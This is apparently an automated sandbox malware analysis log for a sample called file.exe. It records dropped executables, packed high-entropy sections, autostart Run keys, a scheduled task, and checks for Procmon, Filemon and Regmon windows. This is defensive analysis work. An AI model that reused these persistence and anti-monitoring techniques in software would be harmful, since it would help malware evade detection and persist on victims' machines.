Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B0F8A8 pushad ; ret 0_3_00B0F8A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: file.exe Static PE information: section name: entropy: 7.980382453594375
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name: entropy: 7.982378905183867
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name: wehliqok entropy: 7.9535486843252885
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: letztgfz entropy: 7.95471366265782
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name: entropy: 7.7930446616651725
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.982378905183867
Source: skotes.exe.3.dr Static PE information: section name: wehliqok entropy: 7.9535486843252885
Source: random[1].exe.9.dr Static PE information: section name: entropy: 7.980382453594375
Source: 26e226f915.exe.9.dr Static PE information: section name: entropy: 7.980382453594375
Source: random[1].exe0.9.dr Static PE information: section name: letztgfz entropy: 7.95471366265782
Source: ef2532c0b1.exe.9.dr Static PE information: section name: letztgfz entropy: 7.95471366265782
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name: entropy: 7.982378905183867
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name: wehliqok entropy: 7.9535486843252885
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: letztgfz entropy: 7.95471366265782
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name: entropy: 7.7930446616651725
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name: entropy: 7.982378905183867
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name: wehliqok entropy: 7.9535486843252885
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File created: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File created: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File created: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File created: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 90bef5afae.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ef2532c0b1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26e226f915.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26e226f915.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26e226f915.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ef2532c0b1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ef2532c0b1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 90bef5afae.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 90bef5afae.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
